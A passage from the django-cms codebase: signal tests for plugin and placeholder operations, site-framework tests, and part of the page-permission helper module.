with signal_tester(pre_placeholder_operation) as env:
endpoint = self._get_add_plugin_uri()
data = {'name': 'A Link', 'external_link': 'https://www.django-cms.org'}
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
self.assertEqual(call_kwargs['operation'], ADD_PLUGIN)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(call_kwargs['placeholder'], self._cms_placeholder)
self.assertEqual(call_kwargs['plugin'].name, data['name'])
self.assertEqual(call_kwargs['plugin'].external_link, data['external_link'])
def test_post_add_plugin(self):
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
endpoint = self._get_add_plugin_uri()
data = {'name': 'A Link', 'external_link': 'https://www.django-cms.org'}
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], ADD_PLUGIN)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(post_call_kwargs['placeholder'], self._cms_placeholder)
self.assertTrue(post_call_kwargs['plugin'].pk)
self.assertEqual(post_call_kwargs['plugin'].name, data['name'])
self.assertEqual(post_call_kwargs['plugin'].external_link, data['external_link'])
def test_pre_edit_plugin(self):
plugin = self._add_plugin()
endpoint = self.get_admin_url(Page, 'edit_plugin', plugin.pk)
endpoint += '?cms_path=/en/'
with signal_tester(pre_placeholder_operation) as env:
data = {'name': 'A Link 2', 'external_link': 'https://www.django-cms.org'}
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
self.assertEqual(call_kwargs['operation'], CHANGE_PLUGIN)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(call_kwargs['placeholder'], self._cms_placeholder)
self.assertEqual(call_kwargs['old_plugin'].name, 'A Link')
self.assertEqual(call_kwargs['old_plugin'].external_link, data['external_link'])
self.assertEqual(call_kwargs['new_plugin'].name, data['name'])
self.assertEqual(call_kwargs['new_plugin'].external_link, data['external_link'])
def test_post_edit_plugin(self):
plugin = self._add_plugin()
endpoint = self.get_admin_url(Page, 'edit_plugin', plugin.pk)
endpoint += '?cms_path=/en/'
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
data = {'name': 'A Link 2', 'external_link': 'https://www.django-cms.org'}
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], CHANGE_PLUGIN)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(post_call_kwargs['placeholder'], self._cms_placeholder)
self.assertEqual(post_call_kwargs['old_plugin'].name, 'A Link')
self.assertEqual(post_call_kwargs['old_plugin'].external_link, data['external_link'])
self.assertEqual(post_call_kwargs['new_plugin'].name, data['name'])
self.assertEqual(post_call_kwargs['new_plugin'].external_link, data['external_link'])
def test_pre_delete_plugin(self):
plugin = self._add_plugin()
endpoint = self.get_admin_url(Page, 'delete_plugin', plugin.pk)
endpoint += '?cms_path=/en/'
with signal_tester(pre_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
data = {'post': True}
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 302)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
self.assertEqual(call_kwargs['operation'], DELETE_PLUGIN)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(call_kwargs['placeholder'], self._cms_placeholder)
self.assertEqual(call_kwargs['plugin'].name, 'A Link')
self.assertEqual(call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
def test_post_delete_plugin(self):
plugin = self._add_plugin()
endpoint = self.get_admin_url(Page, 'delete_plugin', plugin.pk)
endpoint += '?cms_path=/en/'
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
data = {'post': True}
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 302)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], DELETE_PLUGIN)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(post_call_kwargs['placeholder'], self._cms_placeholder)
self.assertEqual(post_call_kwargs['plugin'].name, 'A Link')
self.assertEqual(post_call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
def test_pre_move_plugin(self):
plugin = self._add_plugin()
endpoint = self.get_move_plugin_uri(plugin)
source_placeholder = plugin.placeholder
target_placeholder = self._cms_page.placeholders.get(slot='right-column')
data = {
'plugin_id': plugin.pk,
'target_language': 'en',
'placeholder_id': target_placeholder.pk,
}
with signal_tester(pre_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
self.assertEqual(call_kwargs['operation'], MOVE_PLUGIN)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(call_kwargs['plugin'].name, 'A Link')
self.assertEqual(call_kwargs['plugin'].placeholder, source_placeholder)
self.assertEqual(call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
self.assertEqual(call_kwargs['source_language'], 'en')
self.assertEqual(call_kwargs['source_placeholder'], source_placeholder)
self.assertEqual(call_kwargs['source_parent_id'], plugin.parent_id)
self.assertEqual(call_kwargs['target_language'], 'en')
self.assertEqual(call_kwargs['target_placeholder'], target_placeholder)
self.assertEqual(call_kwargs['target_parent_id'], None)
def test_post_move_plugin(self):
plugin = self._add_plugin()
endpoint = self.get_move_plugin_uri(plugin)
source_placeholder = plugin.placeholder
target_placeholder = self._cms_page.placeholders.get(slot='right-column')
data = {
'plugin_id': plugin.pk,
'target_language': 'en',
'placeholder_id': target_placeholder.pk,
}
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], MOVE_PLUGIN)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(post_call_kwargs['plugin'].name, 'A Link')
self.assertEqual(post_call_kwargs['plugin'].placeholder, target_placeholder)
self.assertEqual(post_call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
self.assertEqual(post_call_kwargs['source_language'], 'en')
self.assertEqual(post_call_kwargs['source_placeholder'], source_placeholder)
self.assertEqual(post_call_kwargs['source_parent_id'], plugin.parent_id)
self.assertEqual(post_call_kwargs['target_language'], 'en')
self.assertEqual(post_call_kwargs['target_placeholder'], target_placeholder)
self.assertEqual(post_call_kwargs['target_parent_id'], None)
def test_pre_cut_plugin(self):
user_settings = UserSettings.objects.create(
language="en",
user=self._admin_user,
clipboard=Placeholder.objects.create(slot='clipboard'),
)
plugin = self._add_plugin()
endpoint = self.get_move_plugin_uri(plugin)
data = {
'plugin_id': plugin.pk,
'target_language': 'en',
'placeholder_id': user_settings.clipboard_id,
}
with signal_tester(pre_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
self.assertEqual(call_kwargs['operation'], CUT_PLUGIN)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(call_kwargs['plugin'].name, 'A Link')
self.assertEqual(call_kwargs['plugin'].placeholder, self._cms_placeholder)
self.assertEqual(call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
self.assertEqual(call_kwargs['clipboard'], user_settings.clipboard)
self.assertEqual(call_kwargs['clipboard_language'], 'en')
self.assertEqual(call_kwargs['source_language'], 'en')
self.assertEqual(call_kwargs['source_placeholder'], self._cms_placeholder)
self.assertEqual(call_kwargs['source_parent_id'], plugin.parent_id)
def test_post_cut_plugin(self):
user_settings = UserSettings.objects.create(
language="en",
user=self._admin_user,
clipboard=Placeholder.objects.create(slot='clipboard'),
)
plugin = self._add_plugin()
endpoint = self.get_move_plugin_uri(plugin)
data = {
'plugin_id': plugin.pk,
'target_language': 'en',
'placeholder_id': user_settings.clipboard_id,
}
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], CUT_PLUGIN)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(post_call_kwargs['plugin'].name, 'A Link')
self.assertEqual(post_call_kwargs['plugin'].placeholder, user_settings.clipboard)
self.assertEqual(post_call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
self.assertEqual(post_call_kwargs['clipboard'], user_settings.clipboard)
self.assertEqual(post_call_kwargs['clipboard_language'], 'en')
self.assertEqual(post_call_kwargs['source_language'], 'en')
self.assertEqual(post_call_kwargs['source_placeholder'], self._cms_placeholder)
self.assertEqual(post_call_kwargs['source_parent_id'], plugin.parent_id)
def test_pre_paste_plugin(self):
user_settings = UserSettings.objects.create(
language="en",
user=self._admin_user,
clipboard=Placeholder.objects.create(slot='clipboard'),
)
plugin = self._add_plugin(placeholder=user_settings.clipboard)
endpoint = self.get_move_plugin_uri(plugin)
data = {
'plugin_id': plugin.pk,
'placeholder_id': self._cms_placeholder.pk,
'move_a_copy': 'true',
'target_language': 'en',
'plugin_order[]': ['__COPY__'],
}
with signal_tester(pre_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
self.assertEqual(call_kwargs['operation'], PASTE_PLUGIN)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(call_kwargs['plugin'].name, 'A Link')
self.assertEqual(call_kwargs['plugin'].placeholder, user_settings.clipboard)
self.assertEqual(call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
self.assertEqual(call_kwargs['target_language'], 'en')
self.assertEqual(call_kwargs['target_placeholder'], self._cms_placeholder)
self.assertEqual(call_kwargs['target_parent_id'], None)
def test_post_paste_plugin(self):
user_settings = UserSettings.objects.create(
language="en",
user=self._admin_user,
clipboard=Placeholder.objects.create(slot='clipboard'),
)
plugin = self._add_plugin(placeholder=user_settings.clipboard)
endpoint = self.get_move_plugin_uri(plugin)
data = {
'plugin_id': plugin.pk,
'placeholder_id': self._cms_placeholder.pk,
'target_language': 'en',
'move_a_copy': 'true',
'plugin_order[]': ['__COPY__'],
}
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], PASTE_PLUGIN)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(post_call_kwargs['plugin'].name, 'A Link')
self.assertEqual(post_call_kwargs['plugin'].placeholder, self._cms_placeholder)
self.assertEqual(post_call_kwargs['plugin'].external_link, 'https://www.django-cms.org')
self.assertEqual(post_call_kwargs['target_language'], 'en')
self.assertEqual(post_call_kwargs['target_placeholder'], self._cms_placeholder)
self.assertEqual(post_call_kwargs['target_parent_id'], None)
def test_pre_paste_placeholder(self):
user_settings = UserSettings.objects.create(
language="en",
user=self._admin_user,
clipboard=Placeholder.objects.create(slot='clipboard'),
)
placeholder_plugin = self._add_plugin(
user_settings.clipboard,
'PlaceholderPlugin',
)
ref_placeholder = placeholder_plugin.placeholder_ref
self._add_plugin(ref_placeholder)
endpoint = self.get_move_plugin_uri(placeholder_plugin)
data = {
'plugin_id': placeholder_plugin.pk,
'placeholder_id': self._cms_placeholder.pk,
'move_a_copy': 'true',
'target_language': 'en',
'plugin_order[]': ['__COPY__'],
}
with signal_tester(pre_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
plugin = call_kwargs['plugins'][0].get_bound_plugin()
self.assertEqual(call_kwargs['operation'], PASTE_PLACEHOLDER)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(plugin.name, 'A Link')
self.assertEqual(plugin.placeholder, ref_placeholder)
self.assertEqual(plugin.external_link, 'https://www.django-cms.org')
self.assertEqual(call_kwargs['target_language'], 'en')
self.assertEqual(call_kwargs['target_placeholder'], self._cms_placeholder)
def test_post_paste_placeholder(self):
user_settings = UserSettings.objects.create(
language="en",
user=self._admin_user,
clipboard=Placeholder.objects.create(slot='clipboard'),
)
placeholder_plugin = self._add_plugin(
user_settings.clipboard,
'PlaceholderPlugin',
)
ref_placeholder = placeholder_plugin.placeholder_ref
self._add_plugin(ref_placeholder)
endpoint = self.get_move_plugin_uri(placeholder_plugin)
data = {
'plugin_id': placeholder_plugin.pk,
'placeholder_id': self._cms_placeholder.pk,
'target_language': 'en',
'move_a_copy': 'true',
'plugin_order[]': ['__COPY__'],
}
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
plugin = post_call_kwargs['plugins'][0].get_bound_plugin()
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], PASTE_PLACEHOLDER)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(plugin.name, 'A Link')
self.assertEqual(plugin.placeholder, self._cms_placeholder)
self.assertEqual(plugin.external_link, 'https://www.django-cms.org')
self.assertEqual(post_call_kwargs['target_language'], 'en')
self.assertEqual(post_call_kwargs['target_placeholder'], self._cms_placeholder)
def test_pre_add_plugins_from_placeholder(self):
plugin = self._add_plugin()
endpoint = self.get_admin_url(Page, 'copy_plugins') + '?cms_path=/en/'
source_placeholder = plugin.placeholder
target_placeholder = self._cms_page.placeholders.get(slot='right-column')
data = {
'source_language': 'en',
'source_placeholder_id': self._cms_placeholder.pk,
'target_language': 'de',
'target_placeholder_id': target_placeholder.pk,
}
with signal_tester(pre_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
en_plugin = call_kwargs['plugins'][0].get_bound_plugin()
self.assertEqual(call_kwargs['operation'], ADD_PLUGINS_FROM_PLACEHOLDER)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(plugin, en_plugin)
self.assertEqual(call_kwargs['source_language'], 'en')
self.assertEqual(call_kwargs['source_placeholder'], source_placeholder)
self.assertEqual(call_kwargs['target_language'], 'de')
self.assertEqual(call_kwargs['target_placeholder'], target_placeholder)
def test_post_add_plugins_from_placeholder(self):
plugin = self._add_plugin()
endpoint = self.get_admin_url(Page, 'copy_plugins') + '?cms_path=/en/'
source_placeholder = plugin.placeholder
target_placeholder = self._cms_page.placeholders.get(slot='right-column')
data = {
'source_language': 'en',
'source_placeholder_id': self._cms_placeholder.pk,
'target_language': 'de',
'target_placeholder_id': target_placeholder.pk,
}
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
new_plugin = post_call_kwargs['plugins'][0].get_bound_plugin()
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], ADD_PLUGINS_FROM_PLACEHOLDER)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertNotEqual(plugin, new_plugin)
self.assertEqual(new_plugin.name, 'A Link')
self.assertEqual(new_plugin.placeholder, target_placeholder)
self.assertEqual(new_plugin.external_link, 'https://www.django-cms.org')
self.assertEqual(post_call_kwargs['source_language'], 'en')
self.assertEqual(post_call_kwargs['source_placeholder'], source_placeholder)
self.assertEqual(post_call_kwargs['target_language'], 'de')
self.assertEqual(post_call_kwargs['target_placeholder'], target_placeholder)
def test_pre_clear_placeholder(self):
plugin = self._add_plugin()
endpoint = self.get_clear_placeholder_url(self._cms_placeholder)
with signal_tester(pre_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, {'test': 0})
self.assertEqual(response.status_code, 302)
self.assertEqual(env.call_count, 1)
call_kwargs = env.calls[0][1]
del_plugin = call_kwargs['plugins'][0]
self.assertEqual(call_kwargs['operation'], CLEAR_PLACEHOLDER)
self.assertEqual(call_kwargs['language'], 'en')
self.assertTrue('token' in call_kwargs)
self.assertEqual(call_kwargs['origin'], '/en/')
self.assertEqual(del_plugin.pk, plugin.pk)
self.assertEqual(call_kwargs['placeholder'], self._cms_placeholder)
def test_post_clear_placeholder(self):
plugin = self._add_plugin()
endpoint = self.get_clear_placeholder_url(self._cms_placeholder)
with signal_tester(pre_placeholder_operation, post_placeholder_operation) as env:
with self.login_user_context(self._admin_user):
response = self.client.post(endpoint, {'test': 0})
self.assertEqual(response.status_code, 302)
self.assertEqual(env.call_count, 2)
pre_call_kwargs = env.calls[0][1]
post_call_kwargs = env.calls[1][1]
del_plugin = post_call_kwargs['plugins'][0]
self.assertTrue('token' in post_call_kwargs)
self.assertEqual(post_call_kwargs['operation'], CLEAR_PLACEHOLDER)
self.assertEqual(post_call_kwargs['language'], 'en')
self.assertTrue(pre_call_kwargs['token'] == post_call_kwargs['token'])
self.assertEqual(post_call_kwargs['origin'], '/en/')
self.assertEqual(del_plugin.pk, plugin.pk)
self.assertEqual(post_call_kwargs['placeholder'], self._cms_placeholder)
```
#### File: cms/tests/test_site.py
```python
import copy
from django.contrib.sites.models import Site
from cms.api import create_page
from cms.models import Page, Placeholder
from cms.test_utils.testcases import CMSTestCase, URL_CMS_PAGE
from cms.utils.conf import get_cms_setting
from cms.utils.urlutils import admin_reverse
class SiteTestCase(CMSTestCase):
"""Site framework specific test cases.
All stuff which is changing settings.SITE_ID for tests should come here.
"""
def setUp(self):
self.assertEqual(Site.objects.all().count(), 1)
with self.settings(SITE_ID=1):
u = self._create_user("test", True, True)
# setup sites
self.site2 = Site.objects.create(domain="sample2.com", name="sample2.com", pk=2)
self.site3 = Site.objects.create(domain="sample3.com", name="sample3.com", pk=3)
self._login_context = self.login_user_context(u)
self._login_context.__enter__()
def tearDown(self):
self._login_context.__exit__(None, None, None)
def test_site_framework(self):
#Test the site framework, and test if it's possible to disable it
with self.settings(SITE_ID=self.site2.pk):
create_page("page_2a", "nav_playground.html", "de", site=self.site2)
response = self.client.get("%s?site__exact=%s" % (URL_CMS_PAGE, self.site3.pk))
self.assertEqual(response.status_code, 200)
create_page("page_3b", "nav_playground.html", "de", site=self.site3)
with self.settings(SITE_ID=self.site3.pk):
create_page("page_3a", "nav_playground.html", "nl", site=self.site3)
# with param
self.assertEqual(Page.objects.on_site(self.site2.pk).count(), 1)
self.assertEqual(Page.objects.on_site(self.site3.pk).count(), 2)
self.assertEqual(Page.objects.drafts().on_site().count(), 2)
with self.settings(SITE_ID=self.site2.pk):
# without param
self.assertEqual(Page.objects.drafts().on_site().count(), 1)
def test_site_preview(self):
page = create_page("page", "nav_playground.html", "de", site=self.site2, published=True)
page_edit_url_on = self.get_edit_on_url(page.get_absolute_url('de'))
with self.login_user_context(self.get_superuser()):
# set the current site on changelist
response = self.client.post(admin_reverse('cms_page_changelist'), {'site': self.site2.pk})
self.assertEqual(response.status_code, 200)
# simulate user clicks on preview icon
response = self.client.get(admin_reverse('cms_page_preview_page', args=[page.pk, 'de']))
self.assertEqual(response.status_code, 302)
self.assertEqual(response._headers['location'][1], 'http://sample2.com{}&language=de'.format(page_edit_url_on))
def test_site_publish(self):
self._login_context.__exit__(None, None, None)
pages = {"2": list(range(0, 5)), "3": list(range(0, 5))}
lang_settings = copy.deepcopy(get_cms_setting('LANGUAGES'))
lang_settings[3][1]['public'] = True
with self.settings(CMS_LANGUAGES=lang_settings, LANGUAGE_CODE="de"):
with self.settings(SITE_ID=self.site2.pk):
pages["2"][0] = create_page("page_2", "nav_playground.html", "de",
site=self.site2, published=True)
pages["2"][1] = create_page("page_2_1", "nav_playground.html", "de",
parent=pages["2"][0], site=self.site2, published=True)
pages["2"][2] = create_page("page_2_2", "nav_playground.html", "de",
parent=pages["2"][0], site=self.site2, published=True)
pages["2"][3] = create_page("page_2_1_1", "nav_playground.html", "de",
parent=pages["2"][1], site=self.site2, published=True)
pages["2"][4] = create_page("page_2_1_2", "nav_playground.html", "de",
parent=pages["2"][1], site=self.site2, published=True)
for page in pages["2"]:
page_url = page.get_absolute_url(language='de')
response = self.client.get(page_url)
self.assertEqual(response.status_code, 200)
with self.settings(SITE_ID=self.site3.pk):
pages["3"][0] = create_page("page_3", "nav_playground.html", "de",
site=self.site3)
pages["3"][0].publish('de')
pages["3"][1] = create_page("page_3_1", "nav_playground.html", "de",
parent=pages["3"][0], site=self.site3, published=True)
pages["3"][2] = create_page("page_3_2", "nav_playground.html", "de",
parent=pages["3"][0], site=self.site3, published=True)
pages["3"][3] = create_page("page_3_1_1", "nav_playground.html", "de",
parent=pages["3"][1], site=self.site3, published=True)
pages["3"][4] = create_page("page_3_1_2", "nav_playground.html", "de",
parent=pages["3"][1], site=self.site3, published=True)
for page in pages["3"]:
if page.is_home:
page_url = "/de/"
else:
page_url = page.get_absolute_url(language='de')
response = self.client.get(page_url)
self.assertEqual(response.status_code, 200)
def test_site_delete(self):
with self.settings(SITE_ID=self.site2.pk):
create_page("page_2a", "nav_playground.html", "de", site=self.site2)
self.assertEqual(Placeholder.objects.count(), 2)
self.site2.delete()
self.assertEqual(Placeholder.objects.count(), 0)
```
#### File: cms/utils/page_permissions.py
```python
from functools import wraps
from django.utils.decorators import available_attrs
from cms.api import get_page_draft
from cms.cache.permissions import get_permission_cache, set_permission_cache
from cms.constants import GRANT_ALL_PERMISSIONS
from cms.models import Page, Placeholder
from cms.utils import get_current_site
from cms.utils.conf import get_cms_setting
from cms.utils.permissions import (
cached_func,
get_model_permission_codename,
get_page_actions_for_user,
has_global_permission,
)
PAGE_ADD_CODENAME = get_model_permission_codename(Page, 'add')
PAGE_CHANGE_CODENAME = get_model_permission_codename(Page, 'change')
PAGE_DELETE_CODENAME = get_model_permission_codename(Page, 'delete')
PAGE_PUBLISH_CODENAME = get_model_permission_codename(Page, 'publish')
PAGE_VIEW_CODENAME = get_model_permission_codename(Page, 'view')
# Maps an action to the required Django auth permission codes
_django_permissions_by_action = {
'add_page': [PAGE_ADD_CODENAME, PAGE_CHANGE_CODENAME],
'change_page': [PAGE_CHANGE_CODENAME],
'change_page_advanced_settings': [PAGE_CHANGE_CODENAME],
'change_page_permissions': [PAGE_CHANGE_CODENAME],
'delete_page': [PAGE_CHANGE_CODENAME, PAGE_DELETE_CODENAME],
'delete_page_translation': [PAGE_CHANGE_CODENAME, PAGE_DELETE_CODENAME],
'move_page': [PAGE_CHANGE_CODENAME],
'publish_page': [PAGE_CHANGE_CODENAME, PAGE_PUBLISH_CODENAME],
'revert_page_to_live': [PAGE_CHANGE_CODENAME]
}
def _get_draft_placeholders(page):
if page.publisher_is_draft:
return page.placeholders.all()
return Placeholder.objects.filter(page__pk=page.publisher_public_id)
def _check_delete_translation(user, page, language, site=None):
return user_can_change_page(user, page, site=site)
def _get_page_ids_for_action(user, site, action, check_global=True, use_cache=True):
if user.is_superuser or not get_cms_setting('PERMISSION'):
# got superuser, or permissions aren't enabled?
# just return grant all mark
return GRANT_ALL_PERMISSIONS
if use_cache:
# read from cache if possible
cached = get_permission_cache(user, action)
get_page_actions = get_page_actions_for_user
else:
cached = None
get_page_actions = get_page_actions_for_user.without_cache
if cached is not None:
return cached
if check_global and has_global_permission(user, site, action=action, use_cache=use_cache):
return GRANT_ALL_PERMISSIONS
page_actions = get_page_actions(user, site)
page_ids = list(page_actions[action])
set_permission_cache(user, action, page_ids)
return page_ids
def auth_permission_required(action):
def decorator(func):
@wraps(func, assigned=available_attrs(func))
def wrapper(user, *args, **kwargs):
if not user.is_authenticated():
return False
permissions = _django_permissions_by_action[action]
if not user.has_perms(permissions):
# Fail fast if the user does not have permissions
# in Django to perform the action.
return False
permissions_enabled = get_cms_setting('PERMISSION')
if not user.is_superuser and permissions_enabled:
return func(user, *args, **kwargs)
return True
return wrapper
return decorator
def change_permission_required(func):
@wraps(func, assigned=available_attrs(func))
def wrapper(user, page, site=None):
if not user_can_change_page(user, page, site=site):
return False
return func(user, page, site=site)
return wrapper
def skip_if_permissions_disabled(func):
@wraps(func, assigned=available_attrs(func))
def wrapper(user, page, site=None):
if not get_cms_setting('PERMISSION'):
return True
return func(user, page, site=site)
return wrapper
@cached_func
@auth_permission_required('add_page')
def user_can_add_page(user, site=None):
if site is None:
site = get_current_site()
return has_global_permission(user, site, action='add_page')
@cached_func
@auth_permission_required('add_page')
def user_can_add_subpage(user, target, site=None):
"""
Return true if the current user has permission to add a new page
under target.
:param user:
:param target: a Page object
:param site: optional Site object (not just PK)
:return: Boolean
"""
has_perm = has_generic_permission(
page=target,
user=user,
action='add_page',
site=site,
)
return has_perm
@cached_func
@auth_permission_required('change_page')
def user_can_change_page(user, page, site=None):
can_change = has_generic_permission(
page=page,
user=user,
action='change_page',
site=site,
)
return can_change
@cached_func
@auth_permission_required('delete_page')
def user_can_delete_page(user, page, site=None):
has_perm = has_generic_permission(
page=page,
user=user,
action='delete_page',
site=site,
)
if not has_perm:
return False
languages = page.get_languages()
placeholders = (
_get_draft_placeholders(page)
.filter(cmsplugin__language__in=languages)
.distinct()
)
for placeholder in placeholders.iterator():
if not placeholder.has_delete_plugins_permission(user, languages):
return False
return True
@cached_func
@auth_permission_required('delete_page_translation')
def user_can_delete_page_translation(user, page, language, site=None):
has_perm = has_generic_permission(
page=page,
user=user,
action='delete_page_translation',
site=site,
)
if not has_perm:
return False
placeholders = (
_get_draft_placeholders(page)
.filter(cmsplugin__language=language)
.distinct()
)
for placeholder in placeholders.iterator():
if not placeholder.has_delete_plugins_permission(user, [language]):
return False
return True
@cached_func
@auth_permission_required('change_page')
def user_can_revert_page_to_live(user, page, language, site=None):
if not user_can_change_page(user, page, site=site):
return False
placeholders = (
_get_draft_placeholders(page)
.filter(cmsplugin__language=language)
.distinct()
)
for placeholder in placeholders.iterator():
if not placeholder.has_delete_plugins_permission(user, [language]):
return False
return True
@cached_func
@auth_permission_required('publish_page')
def user_can_publish_page(user, page, site=None):
has_perm = has_generic_permission(
page=page,
user=user,
action='publish_page',
site=site,
)
return has_perm
@cached_func
@auth_permission_required('change_page_advanced_settings')
def user_can_change_page_advanced_settings(user, page, site=None):
has_perm = has_generic_permission(
page=page,
user=user,
action='change_page_advanced_settings',
site=site,
)
return has_perm
@cached_func
@auth_permission_required('change_page_permissions')
def user_can_change_page_permissions(user, page, site=None):
has_perm = has_generic_permission(
page=page,
user=user,
action='change_page_permissions',
site=site,
)
return has_perm
@cached_func
@auth_permission_required('move_page')
def user_can_move_page(user, page, site=None):
has_perm = has_generic_permission(
page=page,
user=user,
action='move_page',
site=site,
)
return has_perm
@cached_func
